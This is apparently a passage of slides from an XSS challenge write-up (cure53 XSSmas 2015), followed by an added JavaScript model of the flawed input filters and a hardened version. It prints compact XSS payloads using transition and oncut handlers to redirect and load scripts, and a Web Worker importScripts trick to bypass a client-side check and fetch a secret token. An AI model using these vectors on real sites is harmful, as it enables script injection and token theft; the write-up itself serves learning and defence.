  • 31. JS strings 101 135 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut= `<script>`?alert (URL):location=[`index3/index2.php`,all[58].src,URL] +tabindex=1#x Fortunately I had forgotten a simple trick for concatenating strings, which saved me exactly the 2 bytes I needed: ?&xss=/index2.php'style=transition: 1s+id=x+onwebkittransitionend=oncut=`<script>`?alert(URL):location=[/index3/,all [58].src,URL]+tabindex=1#x ?&xss=/index2.php'style=transition:1s+id=x+onwebkittransitionend=location=oncut= [`<script>`?alert(URL):/index3/,all[58].src,URL]+tabindex=1#x
  • 32. Jontransition & Co. A couple of days before the end of the contest this mysterious “guy” appeared in the scoreboard… ~.~ and @phiber told me that I was going to be defeated, driving me crazy. So I started thinking again, trying to split, slice, replace the innerHTML in order to save 1 more byte by reusing the “transition” string from “Jontransition”. But I couldn’t improve the vector that way, so I tried again some other paths...
  • 33. more ideas ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut=location= [`<script>index3/index2.php`, (all[60]||alert(URL)).src,URL]+tabindex=1#x Alternative 135 solution. ?&xss='style=transition:1s+id=x+onwebkittransitionend= x.oncut-1?location= [`<script>index3/index2.php`,all[60].src,URL] :alert(URL)+tabindex=1#x I thought this idea could save me a couple of bytes, but at the end I couldn’t :( Anyway it is interesting (136): + oncut == null vs. onend == undefined + +null == 0 vs. +undefined == NaN ... oncut-1 == -1 == true vs. undefined-1 == NaN == false
  • 34. the end At the end Jontransition didn’t make it (or did he? ~.^), and after several days of having fun, learning and suffering I was lucky enough to win :) I hope I have not bored you too much, and that you have found at least something interesting... Congrats to the rest of the winners :) Also thanks to Mario, @mmrupp and @filedescriptor for organizing these contests and sharing their knowledge.
  • 36. bonus token.php
    + Server-side checks for the Referer (not empty & different than “xssmas2015.cure53.co.uk”) and for a valid token.
    + Client-side check:
      if (document.location.href == document.location.protocol + '//localhost' + location.pathname) callback({foo:"thesecret"})
    A Web Worker’s context allows setting the document and location properties and loading the file with importScripts:
      document={location:{href:'//localhost',protocol:''}};location={pathname:''};importScripts('https://xssmas2015.cure53.co.uk/token.php?token=<TOKEN>&callback=postMessage')
    So that should bypass the client-side check and get the token for index2.php, but...
    + Chrome does not send Referer on Web Worker’s requests from Blob URLs (we need an external file).
    + Nor does Chrome send cookies on cross-domain requests from a Web Worker (B req. A), unless the page B which created the Web Worker is loaded in a page-A’s iframe (dafuq :S is this in the spec?)
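
Added example (not from the slides or the challenge's source code): a JavaScript model of the index.php and index3.php filters described in slides 7 to 15, next to a hardened rendering, showing how rewriting input instead of encoding it produces handler attributes the request never contained. The blacklist entries, the strip-then-encode order, the sample inputs and all function names are assumptions inferred from the slides.

```javascript
// ASSUMPTION: only these two entries are implied by the slides (onanimationstop and
// onanimationcut both came back as onanimationend); the real blacklist is not published.
const ASSUMED_BLACKLIST = ["onstop", "oncut"];

// Models htmlentities() called without ENT_QUOTES: single quotes pass through.
const encodeNoSingleQuote = (s) =>
  s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/"/g, "&quot;");

// Hardened encoder: also encodes the quote character that delimits the attribute.
const encodeAttr = (s) => encodeNoSingleQuote(s).replace(/'/g, "&#39;");

// Flawed index.php model (assumed order: strip "<script>", then encode).
function renderIndexFlawed(xss) {
  const stripped = xss.split("<script>").join("");
  return `<div class='${encodeNoSingleQuote(stripped)}'></div>`;
}

// Flawed index3.php model: blacklisted names are rewritten to "onend", then encoded.
function renderIndex3Flawed(xss) {
  let v = xss;
  for (const name of ASSUMED_BLACKLIST) v = v.split(name).join("onend");
  return `<p class='${encodeNoSingleQuote(v)}'></p>`;
}

// Hardened rendering: no stripping or rewriting, only context-correct encoding.
const renderHardened = (tag, xss) => `<${tag} class='${encodeAttr(xss)}'></${tag}>`;

// Minimal start-tag tokenizer (sufficient for these samples): returns attribute names.
function attributeNames(html) {
  const m = /^<[a-z]+/i.exec(html);
  if (!m) return [];
  const names = [];
  let i = m[0].length;
  while (i < html.length && html[i] !== ">") {
    if (/[\s/]/.test(html[i])) { i++; continue; }
    let name = "";
    while (i < html.length && !/[\s/>=]/.test(html[i])) name += html[i++];
    if (name) names.push(name.toLowerCase());
    while (/\s/.test(html[i] || "")) i++;
    if (html[i] !== "=") continue;
    i++;
    while (/\s/.test(html[i] || "")) i++;
    const q = html[i];
    if (q === "'" || q === '"') {          // quoted value: skip to the closing quote
      i = html.indexOf(q, i + 1);
      i = i === -1 ? html.length : i + 1;
    } else {                               // unquoted value: ends at whitespace or ">"
      while (i < html.length && !/[\s>]/.test(html[i])) i++;
    }
  }
  return names;
}

// Event-handler attributes the browser would see on the rendered element.
const handlerAttributes = (html) => attributeNames(html).filter((n) => n.startsWith("on"));

// Handlers in the response whose names never appeared in the request: these were
// manufactured by the server-side rewrite, so request/response matching cannot see them.
const handlersNotInRequest = (xss, html) =>
  handlerAttributes(html).filter((n) => !xss.toLowerCase().includes(n));

// Constructed sample inputs using the harmless alert(1) probe from the slides.
const SAMPLE_INDEX = "'tabindex=1 onfocus<script>=alert(1)//";
const SAMPLE_INDEX3 = "'onanimationstop=alert(1)//";
const SAMPLE_INDEX3_CUT = "'onanimationcut=alert(1)//";
```

In the hardened form the single quote never closes `class`, so the whole input stays inside one attribute value and no name rewriting is needed.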